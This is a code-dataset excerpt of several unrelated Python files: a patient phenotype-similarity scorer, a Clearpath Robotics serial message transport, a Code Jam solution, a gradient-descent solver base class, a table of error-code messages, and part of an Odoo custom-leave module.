matches\n\n\ndef evaluate_pheno_similariy(hpoic, hpo, hpo_terms, disorders, pheno_matching_patient, max_similarity):\n \"\"\"Evaluates the similarity of two patients based on phenotype features\n\n Args:\n hpoic(class) : the information content for the HPO\n hpo(class): an instance of the class for interacting with HPO\n hpo_terms(list): HPO terms of the query patient\n disorders(list): OMIM disorders of the query patient\n pheno_matching_patient(patient_obj): a patient object from the database\n max_similarity(float): a floating point number representing the highest value allowed for a feature\n\n Returns:\n 
patient_similarity(float): the computed phenotype similarity among the patients\n \"\"\"\n patient_similarity = 0\n hpo_score = 0\n omim_score = 0\n max_omim_score = 0\n max_hpo_score = 0\n matching_hpo_terms = features_to_hpo(pheno_matching_patient.get('features'))\n matching_omim_terms = disorders_to_omim(pheno_matching_patient.get('disorders'))\n if hpo_terms:\n if matching_hpo_terms:\n LOG.info('HPO terms available for comparison')\n if disorders:\n if matching_omim_terms:\n LOG.info('OMIM diagnoses available for comparison')\n max_omim_score = max_similarity / 2\n max_hpo_score = max_similarity / 2\n else:\n max_hpo_score = max_similarity\n hpo_score = similarity_wrapper(hpoic, hpo, max_hpo_score, hpo_terms, matching_hpo_terms)\n else:\n LOG.debug('Missing HPO terms, phenotype comparison based on OMIM diagnoses.')\n max_omim_score = max_similarity / 2\n if max_omim_score:\n omim_score = evaluate_subcategories(disorders, matching_omim_terms, max_omim_score)\n patient_similarity = hpo_score + omim_score\n LOG.info('patient phenotype score: {0} (OMIM:{1}, HPO:{2})'.format(patient_similarity, omim_score, hpo_score))\n return patient_similarity\n\n\ndef similarity_wrapper(hpoic, hpo, max_hpo_score, hpo_terms_q, hpo_terms_m):\n \"\"\"A wrapper around patient-similarity repository:\n https://github.com/buske/patient-similarity.\n\n Args:\n hpoic(class) : the information content for the HPO\n hpo(class): an instance of the class for interacting with HPO\n max_hpo_score(float): max score which can be assigned to HPO similarity\n hpo_terms_q(list): a list of HPO terms from query patient\n hpo_terms_m(list): a list of HPO terms from match patient\n\n Returns:\n score(float): simgic similarity score after HPO term comparison\n \"\"\"\n terms = set()\n for term_id in hpo_terms_q:\n term = hpo[term_id]\n if term:\n terms.add(term)\n\n query_patient = Patient(id='q', hp_terms=terms)\n terms = set()\n for term_id in hpo_terms_m:\n term = hpo[term_id]\n if term:\n terms.add(term)\n\n match_patient = Patient(id='m', hp_terms=terms)\n score_obj = compare_patients(hpoic=hpoic, patient1=query_patient, patient2=match_patient,\n scores=['simgic'])\n simgic_score = score_obj.get('simgic')\n LOG.info('patient-similarity module returned a simgic score of {}'.format(simgic_score))\n relative_simgic_score = simgic_score * max_hpo_score\n return relative_simgic_score\n\n\ndef evaluate_subcategories(list1, list2, max_score):\n \"\"\"returns a numerical representation of the similarity of two lists of strings\n\n Args:\n list1(list): a list of strings (this is a list of items from the query patient)\n list2(list): another list of strings (list of items from the patients in database)\n max_score(float): the maximum value to return if the lists are identical\n\n Returns:\n matching_score(float): a number reflecting the similarity between the lists\n \"\"\"\n matching_score = 0\n if len(list1) > 0:\n list_item_score = max_score / len(list1)\n n_shared_items = len(set(list1).intersection(list2))\n matching_score = n_shared_items * list_item_score\n return matching_score","sub_path":"pycfiles/patientMatcher-1.1.1.tar/phenotype_matcher.cpython-36.py","file_name":"phenotype_matcher.cpython-36.py","file_ext":"py","file_size_in_byte":6894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"560932399","text":"#! 
/usr/bin/env python -m\n# -*- coding: utf-8 -*-\n# _____\n# / _ \\\n# / _/ \\ \\\n# / / \\_/ \\\n# / \\_/ _ \\ ___ _ ___ ___ ____ ____ ___ _____ _ _\n# \\ / \\_/ \\ / / _\\| | | __| / _ \\ | ┌┐ \\ | ┌┐ \\ / _ \\ |_ _|| | | |\n# \\ \\_/ \\_/ / | | | | | └─┐| |_| || └┘ / | └┘_/| |_| | | | | └─┘ |\n# \\ \\_/ / | |_ | |_ | ┌─┘| _ || |\\ \\ | | | _ | | | | ┌─┐ |\n# \\_____/ \\___/|___||___||_| |_||_| \\_\\|_| |_| |_| |_| |_| |_|\n# ROBOTICS™\n#\n# File: transports.py\n# Desc: Horizon Message Transport Controllers\n# \n# Copyright © 2010 Clearpath Robotics, Inc. \n# All Rights Reserved\n# \n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of Clearpath Robotics, Inc. nor the\n# names of its contributors may be used to endorse or promote products\n# derived from this software without specific prior written permission.\n# \n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE \n# ARE DISCLAIMED. IN NO EVENT SHALL CLEARPATH ROBOTICS, INC. BE LIABLE FOR ANY\n# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n# Please send comments, questions, or patches to code@clearpathrobotics.com\n#\n\n\n\n\n################################################################################\n# Script\n\n\n\n# Check if run as a script\nif __name__ == \"__main__\":\n \n # Warn of Module ONLY status\n print (\"ERROR: clearpath.horizon.transports is a module and can NOT be run\"\\\n \" as a script!\\nFor a command-line interface demo of Horizon, run:\"\\\n \"\\n python -m clearpath.horizon.demo\\n\"\\\n \"For Horizon message forwarding, run:\\n\"\\\n \" python -m clearpath.horizon.forward\")\n\n # Exit Error\n import sys\n sys.exit(1)\n\n\n\n\n################################################################################\n# Module\n\n\n\n ## @package clearpath.horizon.transports \n# Horizon Transports Python Module\n# \n# Horizon Message Transport Controllers \\n\n# Supported Horizon version(s): 0.1 - 1.0 \\n\n# \\n\n# Supported Transports:\n# - Serial (RS-232)\n#\n# @author Ryan Gariepy\n# @author Malcolm Robert\n# @date 18/01/10\n# @todo Would be nice to support version translation in IP Servers, \n# however, that would require additional work to detect the\n# version that clients are using which is currently not supported\n# by the current framework.\n# @todo FIX encryption\n# @req clearpath.utils \\n\n# clearpath.horizon.messages \\n\n# clearpath.horizon.payloads \\n\n# pySerial [http://pyserial.sourceforge.net/] \\n\n# -- for Serial\n# @version 1.0\n#\n# @section 
USE\n#\n# The intended purpose of this module is to provide functionality to send\n# and receive Horizon messages over the various transports with minimal\n# knowledge of messages and no knowledge of message payloads. Further, as\n# some transports support a one-to-many connection scheme, this module also\n# provides message routing. Note that as this module implements the transports\n# as defined in the Horizon specification, there is no support for version\n# translation. If version translation is desired, refer to the module \n# clearpath.horizon.forward.\n#\n# @section HISTORY\n#\n# Versions 0.1 - 0.3 {Ryan Gariepy}\n# - Initial Creation as protocol.py\n#\n# Version 0.4 {Malcolm Robert}\n# - Moved to horizon_protocol.py\n# - Added protocol abstraction\n# - Added TCP/IP\n# - Added UDP\n# - Added logging\n# - Added version support\n# - Added Doxygen documentation\n# - Changed version scheme to match Horizon doc\n# - Horizon support for v0.4\n#\n# Version 0.5\n# - Horizon support for v0.5\n#\n# Version 0.6\n# - Moved to protocol.py\n# - Horizon support for v0.6\n# - Improved search for header in read\n# - Added TCP encryption\n#\n# Version 0.7\n# - Moved to transport.py\n# - Added Server transports\n# - Added IPv6 support\n# - Horizon support for v 0.1 - 0.7\n# - Python 2.6+ & 3.x compatible\n#\n# Version 0.8\n# - Horizon support for v 0.1 - 0.8\n#\n# Version 1.0\n# - Added one-to-many support\n# - Horizon support for v 0.1 - 1.0\n#\n# @section License\n# @copydoc public_license\n#\n# @defgroup hardware Hardware\n# @ingroup doc\n# \n# @copydoc serial\n#\n# If higher bandwidth communication is required, the protocol may also be \n# packaged verbatim within TCP/IP or UDP packets if desired, with one protocol \n# message per packet. The default Horizon port for TCP/UDP is 7284.\n#\n# @copydoc tcp\n#\n# @copydoc udp\n#\n\"\"\"Horizon Message Transport Controllers\n\n Copyright © 2010 Clearpath Robotics, Inc.\n All rights reserved\n \n Created: 17/03/10\n Authors: Ryan Gariepy & Malcolm Robert\n Version: 1.0\n \"\"\"\n\n\n# Required Clearpath Modules\nfrom .. import utils # Clearpath Utilities\nfrom . import messages # Horizon Protocol Message Definition\nfrom . import codes # Horizon Protocol Versions \n\n# Required Python Modules\nimport logging # Logging Utilities\nimport socket # UDP Port Control\nimport sys # Python Interpreter Functionality\nimport threading # Python Thread Support\nimport time # System Date & Time\nimport collections # deque\nimport math\nfrom select import select\n\n# Version Dependent Modules\ntry:\n import serial # Serial Port Control\nexcept ImportError:\n pass\n\nMessageRecord = collections.namedtuple('MessageRecord', 'message, expiry')\n\n\n# Module Support\n## Module Version\n__version__ = \"1.0\"\n\"\"\"Module Version\"\"\"\n## SVN Code Revision\n__revision__ = \"$Revision: 898 $\"\n\"\"\" SVN Code Revision\"\"\"\n\n\n## Message Log\nlogger = logging.getLogger('clearpath.horizon.transports')\n\"\"\"Horizon Transports Module Log\"\"\"\nlogger.setLevel(logging.NOTSET)\nlogger.addHandler(utils.NullLoggingHandler())\nlogger.propagate = False\nlogger.debug(\"Loading clearpath.horizon.transports ...\") \n\n\n\n\n################################################################################\n# Horizon Transport Controller\n\n\n\n## Transport\n#\nclass Transport(object):\n \"\"\"Horizon Transport Base Class\"\"\"\n pass\n\n\n## Horizon Serial Controller\n#\n# Provides a method to send and receive messages over RS-232. \\n\n# Guarantees order of arrival and arrival. 
\\n\n# Low Bandwidth use only.\n#\n# @req pySerial [http://pyserial.sourceforge.net/]\n# @since 0.1\n#\n# @pydoc\nclass Serial(Transport):\n \"\"\"Horizon Transport Controller - Serial Device\"\"\"\n \n def __init__(self, port = None, store_timeout = 0, receive_callback = None):\n \"\"\"Create A Horizon Serial Transport\"\"\"\n\n # Dependency check\n try:\n serial\n except NameError:\n logger.error(\"%s: Cannot create Horizon Serial Transport without\"\\\n \"pySerial!\" % self.__class__.__name__)\n raise utils.TransportError (\"pySerial not found!\")\n \n if port == None: \n raise utils.TransportError \\\n (\"Serial transport creation failed: port not specified!\\n\")\n\n # Class Variables\n self.port = port\n self._serial = None \n self._opened = False\n self.store_timeout = store_timeout\n self.receive_callback = receive_callback\n self.serial_write_lock = threading.Lock()\n\n # Initialization\n try:\n self._serial = serial.Serial()\n self._serial.port = port\n self._serial.baudrate = 115200\n self._serial.timeout = 0\n \n # Creation failed\n except serial.SerialException as ex:\n raise utils.TransportError \\\n (\"Serial Transport creation failed!\\n\" + str(ex))\n \n\n @classmethod\n def autodetect(cls, **kwargs):\n ports = utils.list_serial_ports()\n logger.info(\"%s: Attempting autodetect with %s.\" % \n (cls.__name__, ' '.join(ports)))\n\n for trynum in range(5):\n logger.info(\"%s: Autodetect try #%d.\" % \n (cls.__name__, trynum + 1))\n for port in ports:\n kwargs['port'] = port\n transport = cls(**kwargs)\n try:\n transport.open()\n return transport\n except utils.TransportError:\n # Not this one, move on.\n pass\n\n raise utils.TransportError(\"Unable to autodetect a serial Horizon device.\")\n \n\n def __str__(self):\n \"\"\"Return the transport device name.\"\"\"\n return self.port\n \n\n def open(self):\n if (not self._opened):\n logger.debug(\"%s: Beginning transport opening for %s.\" % \n (self.__class__.__name__, self._serial.portstr))\n\n try:\n self._serial.open()\n if not self._serial.isOpen():\n raise serial.SerialException\n except serial.SerialException:\n logger.debug(\"%s: Transport opening failed.\" % self.__class__.__name__)\n raise utils.TransportError(\"Serial Port opening failed.\")\n\n self._opened = True\n self.receiver = self.Receiver(self._serial, self.store_timeout, self.receive_callback)\n self.receiver.start()\n time.sleep(0.1)\n \n logger.debug(\"%s: Sending ping request.\" % (self.__class__.__name__))\n message = messages.Message.request('echo') \n try: \n self.send_message(message)\n except utils.TransportError as ex:\n # Must catch this for the sake of closing the serial port and also\n # killing the receiver thread.\n self.close()\n raise utils.TransportError(\"Serial Port message send failed.\\n\" + str(ex))\n \n logger.debug(\"%s: Ping request sent.\" % (self.__class__.__name__))\n\n for sleeping in range(5):\n time.sleep(0.1)\n waiting = self.receiver.get_waiting()\n for message in waiting:\n logger.debug(\"%s: Message received.\" % (self.__class__.__name__))\n if codes.names[message.code] == 'echo':\n # Success\n logger.debug(\"%s: Transport opened.\" % self.__class__.__name__)\n return\n \n logger.debug(\"%s: No response to ping request.\" % self.__class__.__name__)\n self.close()\n raise utils.TransportError(\"Could not communicate with Clearpath platform.\")\n\n\n def close(self):\n logger.debug(\"%s: Beginning transport closing for %s.\" %\n (self.__class__.__name__, self._serial.portstr))\n self.receiver.stop()\n self.receiver.join()\n 
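# the receiver thread has exited at this point, so the port can be closed without racing a pending read\n        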
self._serial.close()\n self._opened = False\n logger.debug(\"%s: Transport closed.\" % self.__class__.__name__)\n\n \n def is_open(self):\n return self._opened;\n\n\n def send_message(self, message):\n \"\"\"Serial Transport Device Send Horizon Message\"\"\"\n self.send_raw(utils.to_bytes(message.data()))\n\n\n def send_raw(self, raw):\n if not self._opened:\n raise utils.TransportError (\"Cannot send while closed!\")\n\n try:\n with self.serial_write_lock:\n try:\n getattr(serial, \"serial_for_url\")\n sent = self._serial.write(raw)\n if sent == None:\n raise utils.TransportError (\"Write Failed!\")\n\n except AttributeError:\n if sys.version_info[0] > 2:\n self._serial.write(list(map(chr, raw)))\n else:\n self._serial.write(raw)\n sent = len(raw)\n \n if sent < len(raw):\n raise utils.TransportError (\"Write Incomplete!\")\n \n # Send Failed\n except serial.SerialException as ex:\n raise utils.TransportError \\\n (\"Serial Message send failed!\\n\" + str(ex))\n\n\n class Receiver(threading.Thread):\n\n def __init__(self, serial, store_timeout, callback):\n threading.Thread.__init__(self, name = 'clearpath.horizon.transports.Serial.Receiver')\n self._running = False\n self._buffer = []\n self._serial = serial\n self._callback = callback\n self.start_time = time.time()\n self.store_timeout = store_timeout\n\n # Received Messages\n self._acks_lock = threading.Lock()\n self._acks = {} # Format: {timestamp: (MessageRecord)}\n self._received_lock = threading.Lock()\n self._received = collections.deque() # Format: MessageRecord\n\n # self.daemon = True\n\n\n def stop(self):\n self._running = False\n\n\n # Only for internal use by Receiver methods. These timestamps have nothing to\n # do with platform time or API time.\n def _timestamp(self):\n return math.floor((time.time() - self.start_time) * 1000)\n\n\n def get_waiting(self, code=0x0000):\n \"\"\"Horizon Protocol Get Waiting Messages\"\"\"\n msgs = []\n skip = collections.deque()\n with self._received_lock:\n try:\n while True:\n message_record = self._received.popleft()\n if code == 0 or message_record.message.code == code:\n msgs.append(message_record.message)\n else:\n skip.append(message_record) \n except IndexError:\n # No more items in the list\n pass\n\n # All the ones we didn't return throw back in the received bin\n self._received = skip\n return msgs\n\n\n def run(self):\n logger.debug(\"%s: Entering receive loop for %s.\" % \n (self.__class__.__name__, self._serial.portstr))\n self._running = True\n \n while self._running:\n # Block until serial data available\n rlist, _, _ = select([ self._serial ], [], [], 1.0)\n if not rlist:\n time.sleep(0.001)\n continue\n \n try:\n message = None\n message = self._get_message()\n if message != None:\n logger.debug(\"%s: received message:\\n %s\" % \\\n (self.__class__.__name__, str(message)))\n except IOError as ex: # TransportError\n # Silently swallow \n logger.warning(\n \"%s: IO error in attempting to retrieve message:\\n%s\" %\\\n (self.__class__.__name__, ex))\n except ValueError as ex: # ChecksumError\n # Silently swallow \n logger.info(\n \"%s: Value error in received message:\\n%s\" %\\\n (self.__class__.__name__, ex))\n \n # If it's a good message with a payload, handle it.\n if message != None and message.payload != None:\n if message.payload.__class__ == codes.payloads.Ack:\n # Mark the ack as received. 
It will be up to the main\n # thread to examine this for status and throw any necessary\n # exceptions.\n with self._acks_lock:\n # It's keyed to the message's baked-in timestamp, because that's how\n # acks are matched. But it's also stored beside the current time per\n # this computer, for the purposes of expiring it.\n self._acks[message.timestamp] = MessageRecord(message = message, \n expiry = self._timestamp() + \n self.store_timeout)\n\n elif self._callback != None and self._callback(message):\n # Okay, handled by asyncronous handlers.\n pass\n\n else:\n # Unhandled. Store it for synchronous access.\n with self._received_lock:\n self._received.append(MessageRecord(message = message, \n expiry = self._timestamp() + \n self.store_timeout))\n\n # Check timeouts\n current = self._timestamp()\n with self._received_lock: # stored messages\n try:\n while current > self._received[0].expiry:\n self._received.popleft()\n except IndexError:\n # No more items in list.\n pass\n with self._acks_lock: # stored acks\n for ts, message_record in list(self._acks.items()): \n if current > message_record.expiry:\n del self._acks[ts]\n\n logger.debug(\"%s: Exiting receive loop for %s.\" % \n (self.__class__.__name__, self._serial.portstr))\n \n def has_ack(self, timestamp):\n with self._acks_lock:\n if timestamp in self._acks:\n ack = self._acks[timestamp][0]\n del self._acks[timestamp]\n return ack\n else:\n return False\n\n\n def _get_message(self):\n read = 0\n\n # read as much as possible without blocking (as timeout = 0)\n chars = self._serial.read(1000)\n\n if len(chars) > 0:\n try:\n getattr(serial, \"serial_for_url\")\n if sys.version_info[0] > 2:\n self._buffer += chars\n else:\n self._buffer += list(map(ord,chars))\n except AttributeError:\n self._buffer += list(map(ord,chars))\n\n # Discard bytes from the buffer until we find a \n # SOH character followed by two characters which are\n # complements, representing the length.\n disc = []\n while(len(self._buffer) > 3 and (\n self._buffer[0] != messages.Message.SOH or\n self._buffer[1] != 0xFF & (~self._buffer[2]) or\n self._buffer[1] == 0)):\n disc.append(self._buffer.pop(0))\n\n if len(disc) > 0:\n logger.info(\"%s: Discarded %d bytes:\\n%s\" % (\n self.__class__.__name__, len(disc), \n ' '.join(map(utils.hex,disc))))\n\n if len(self._buffer) < 3:\n # Not enough data in the buffer read a SOH + LEN + ~LEN.\n return None\n \n length = self._buffer[1] + 3\n \n # Now know message length. Is there enough in the buffer yet to read\n # the whole message? If not, wait.\n if len(self._buffer) < length:\n return None\n \n # Create and return the Message\n raw = self._buffer[0:length]\n self._buffer = self._buffer[length:]\n logger.info(\"%s: Message of %d bytes found:\\n%s\" % (\n self.__class__.__name__, len(raw), \n ' '.join(map(utils.hex,raw))))\n\n # This will throw errors if has a bad checksum, for example,\n # which will bubble up to the run() function.\n return messages.Message.parse(raw)\n\n \n logger.debug(\"... 
clearpath.horizon.transports loaded.\")\n \n","sub_path":"src/clearpath/horizon/transports.py","file_name":"transports.py","file_ext":"py","file_size_in_byte":21583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"118062849","text":"import sys\n\nfd = open(sys.argv[1], 'r')\n\nncases = int(fd.readline()[:-1])\n\nfor case in range(1, ncases+1):\n word = fd.readline()[:-1]\n win = ''\n for char in word:\n if char >= win[:1]:\n win = char + win\n else:\n win = win + char\n\n print(\"Case #\" + str(case) + \":\", win)\n\n","sub_path":"codes/CodeJamCrawler/CJ_16_1/16_1_1_gabriellesc_lastWord.py","file_name":"16_1_1_gabriellesc_lastWord.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"335926511","text":"'''Gradient Descent Step'''\nimport numpy as np\nfrom numpy import linalg as LA\nfrom wolff.models.model import Model\nimport csv\n\nimport abc\n\n\nABC = abc.ABCMeta('ABC', (object,), {})\n\n\nclass GradientDescentSolver(ABC):\n def __init__(self,\n dtheta=0.1,\n theta_0=0.0,\n grids_true=[],\n elapsed_times_true=[],\n theta_min=-np.inf,\n theta_max=np.inf,\n epsilon=1e-6,\n max_iters=1000,\n learning_rate=0.01,\n print_output=False,\n output_file=None):\n\n self.dtheta = dtheta\n self.theta_0 = theta_0\n self.grids_true = grids_true\n self.elapsed_times_true = elapsed_times_true\n self.theta_min = theta_min\n self.theta_max = theta_max\n self.epsilon = epsilon\n self.max_iters = max_iters\n self.learning_rate = learning_rate\n self.print_output = print_output\n self.output_file = output_file\n\n self._model = None\n self._constants_0 = []\n\n @property\n def dtheta(self):\n return self._dtheta\n\n @dtheta.setter\n def dtheta(self, value):\n self._dtheta = value\n\n @property\n def theta_0(self):\n return self._theta_0\n\n @theta_0.setter\n def theta_0(self, value):\n self._theta_0 = value\n\n @property\n def grids_true(self):\n return self._grids_true\n\n @grids_true.setter\n def grids_true(self, value):\n self._grids_true = list(value)\n\n @property\n def elapsed_times_true(self):\n return self._elapsed_times_true\n\n @elapsed_times_true.setter\n def elapsed_times_true(self, value):\n self._elapsed_times_true = list(value)\n\n @property\n def theta_max(self):\n return self._theta_max\n\n @theta_max.setter\n def theta_max(self, value):\n self._theta_max = value\n\n @property\n def theta_min(self):\n return self._theta_min\n\n @theta_min.setter\n def theta_min(self, value):\n self._theta_min = value\n\n @property\n def epsilon(self):\n return self._epsilon\n\n @epsilon.setter\n def epsilon(self, value):\n if value <= 0:\n raise ValueError('Epsilon must be greater than zero')\n self._epsilon = value\n\n @property\n def max_iters(self):\n return self._max_iters\n\n @max_iters.setter\n def max_iters(self, value):\n if value <= 0:\n raise ValueError('Maximum iterations must be greater than zero')\n self._max_iters = value\n\n @property\n def learning_rate(self):\n return self._learning_rate\n\n @learning_rate.setter\n def learning_rate(self, value):\n if value <= 0:\n raise ValueError('Learning rate must be greater than zero')\n self._learning_rate = value\n\n @property\n def model(self):\n return self._model\n\n @model.setter\n def model(self, value):\n if not isinstance(value, Model):\n raise TypeError(\"Must provide wolff.models.model.Model subclass\")\n self._model = value\n\n @property\n def constants_0(self):\n return self._constants_0\n\n 
@property\n def print_output(self):\n return self._print_output\n\n @print_output.setter\n def print_output(self, value):\n self._print_output = value\n\n @property\n def output_file(self):\n return self._output_file\n\n @output_file.setter\n def output_file(self, value):\n self._output_file = value\n\n @property\n def iters(self):\n return self._iters\n\n @property\n def error(self):\n return self._error\n\n def simulate(self):\n if self.theta_0 is None:\n raise RuntimeError('No parameters have been set')\n if self.model is None:\n raise RuntimeError('No model has been set')\n if self.theta_max < self.theta_min:\n raise RuntimeError('theta_max must be greater than theta_min')\n if not self.output_file.lower().endswith('.csv') and \\\n self.output_file is not None:\n raise RuntimeError('Output file must be .csv')\n\n self._iters = 0\n self._error = np.inf\n self._theta = self._theta_0\n\n self._constants = self._constants_0\n\n self._model.grids_true = self._grids_true\n self._model.elapsed_times_true = self._elapsed_times_true\n self._model.dtheta = self._dtheta\n self._model.theta = self._theta\n self._model.process(self.grid)\n\n self._error = LA.norm(self._model.J)\n\n self.Print()\n\n if self._output_file is not None:\n\n with open(self.output_file, mode='w') as initial:\n fieldnames = ['Iteration', 'theta', 'error']\n writer = csv.DictWriter(initial, fieldnames=fieldnames)\n\n writer.writeheader()\n writer.writerow({'Iteration': '{}'.format(self._iters),\n 'theta': '{}'.format(self._theta),\n 'error': '{}'.format(self._error)})\n\n while not self.halt():\n\n self._iters += 1\n\n self.next_theta()\n\n self._theta = np.clip(self._theta,\n self._theta_min,\n self._theta_max)\n\n self._model.theta = self._theta\n self._model.process(self.grid)\n\n self._error = LA.norm(self._model.J)\n\n if self._output_file is not None:\n\n with open(self._output_file, 'a+', newline='') as append:\n fieldnames = ['Iteration', 'theta', 'error']\n append_writer = csv.DictWriter(append,\n fieldnames=fieldnames)\n\n append_writer.writerow(\n {'Iteration': '{}'.format(self._iters),\n 'theta': '{}'.format(self._theta),\n 'error': '{}'.format(self._error)})\n\n self.Print()\n\n return self._theta\n\n def halt(self):\n return (self._error < self._epsilon) or (self._iters > self._max_iters)\n\n def Print(self):\n if self._print_output:\n print('Iteration {}: error = {}\\t theta = {}'.\n format(self._iters, self._error, self._theta))\n\n def __call__(self):\n return self.next_theta()\n\n @abc.abstractmethod\n def next_theta(self):\n pass\n","sub_path":"wolff/optimization/gradient_descent_solver.py","file_name":"gradient_descent_solver.py","file_ext":"py","file_size_in_byte":6442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"11820077","text":"SYSTEM_ERROR = -1\nDATABASE_CONNECTION_ERROR = -2\nREDIS_CONNECTION_ERROR = -3\nFROM_DICT_TO_XML_CONVERSION_ERROR = -5\nFROM_XML_TO_DICT_CONVERSION_ERROR = -6\nSAVE_XML_ERROR = -7\nDATE_PARSE_ERROR = -8\nNO_REQUIRED_PARAM = -9\nOBJECT_DOES_NOT_EXIST = -10\nOK = 0\nNO_TRANSFERS = -13\nINVALID_PASS = -14\nNOT_AUTHORIZED = -15\nUSER_BLOCKED = -16\nACCESS_DENIED = -17\nUNKNOWN_METHOD = -18\nINVALID_REQUISITE = -22\nGNS_DISABLED_REGION = -110\nGNS_WRONG_VEHICLE_NUM = -111\nSF_DISABLED_REGION = -112\nSP_RESPONSE_ERROR = -500\nSP_SEND_REQUEST_ERROR = -501\nSERVICE_CONFIG_ERROR = -100\nABS_SERVER_UNAVAILABLE = -101\n\nMESSAGES = {\n 'ru': {\n OK: 'ok',\n NO_TRANSFERS: 'Нет трансферов',\n SYSTEM_ERROR: 'Системная ошибка, 
попробуйте позже',\n INVALID_PASS: 'Неверное имя пользователя или пароль',\n NOT_AUTHORIZED: 'Сессия закрыта',\n USER_BLOCKED: 'Доступ заблокирован!',\n ACCESS_DENIED: 'Доступ заблокирован!',\n FROM_DICT_TO_XML_CONVERSION_ERROR: (\n 'Ошибка конвертирования от Dictionary к XML'\n ),\n FROM_XML_TO_DICT_CONVERSION_ERROR: (\n 'Ошибка конвертирования от XML к Dictionary'\n ),\n SAVE_XML_ERROR: 'Ошибка при сохранении XML',\n DATABASE_CONNECTION_ERROR: 'Ошибка соединения с базой данных',\n REDIS_CONNECTION_ERROR: 'Ошибка соединения с Redis',\n DATE_PARSE_ERROR: 'Формат даты некорректный',\n INVALID_REQUISITE: 'Неверный реквизит',\n NO_REQUIRED_PARAM: 'отсутствует обязательный параметр',\n OBJECT_DOES_NOT_EXIST: 'Запрашиваемого объекта в БД не существует',\n GNS_DISABLED_REGION: 'По выбранному району оплата невозможна.',\n GNS_WRONG_VEHICLE_NUM: 'Неверный номер транспорта!',\n SF_DISABLED_REGION: (\n 'Прием платежей от ИП за Октябрьского и Сокулукского '\n 'районов осуществляется в ГНС при ПКР.'\n ),\n SP_RESPONSE_ERROR: 'Ошибка! Ответ от сервера не успешно',\n SP_SEND_REQUEST_ERROR: 'Ошибка при запросе в сервер провайдера',\n UNKNOWN_METHOD: 'Неверный метод',\n SERVICE_CONFIG_ERROR: 'Неверное значение в запросе',\n ABS_SERVER_UNAVAILABLE: 'Сервер АБС не доступен',\n },\n 'en': {},\n 'kg': {},\n}\n","sub_path":"controller/codes.py","file_name":"codes.py","file_ext":"py","file_size_in_byte":2808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"200122046","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api, _\nfrom dateutil import relativedelta\nimport datetime\nfrom odoo.exceptions import ValidationError\n\n\nclass CustomLeave(models.Model):\n _inherit = 'hr.leave.type'\n _description = 'Custom Leaves'\n\n custom_leave = fields.Boolean(string=\"Custom Leave\", default=False)\n fixed_period = fields.Float(string=\"Fixed Period\", default=1)\n only_time_granted = fields.Boolean(string=\"Only time Granted\", default=False)\n applicable_for = fields.Selection(\n [('both', 'Both'),\n ('female', 'Female')], string=\"Applicable For\", default='both')\n allocated_method = fields.Selection(\n [('manual', 'Manual'),\n ('auto', 'Automated')], string=\"Allocated Method\", default='manual')\n automated_allocation = fields.Selection([('based', 'Based on Experience'), ('custom', 'Custom Period')],\n default='based')\n number_per_interval = fields.Float(\"Number of unit per interval\", default=1)\n interval_number = fields.Integer(\"Number of unit between two intervals\", default=1)\n unit_per_interval = fields.Selection([\n ('days', 'Day(s)')\n ], string=\"Unit of time added at each interval\", default='days')\n interval_unit = fields.Selection([\n ('months', 'Month'),\n ('years', 'Year')\n ], string=\"Unit of time between two intervals\", default='months')\n date_to = fields.Date()\n\n\nclass AddAttachment(models.Model):\n _inherit = 'hr.leave'\n _description = 'Add Attachment'\n\n attachment = fields.Many2many('ir.attachment', string=\"Attachment\", copy=False)\n cus_level = fields.Boolean(string=\"cus level\", related='holiday_status_id.custom_leave')\n\n\n def action_approve(self):\n res = super(AddAttachment, self).action_approve()\n if self.holiday_status_id.custom_leave == True and self.holiday_status_id.applicable_for == 'both' and self.holiday_status_id.only_time_granted == True:\n if self.employee_id.employee_time_granted == False:\n self.employee_id.employee_time_granted = True\n return res\n \n 
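# The constraint below enforces the custom-leave configuration (duration cap, gender applicability, one-time grants) whenever a request's leave type changes.\n 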
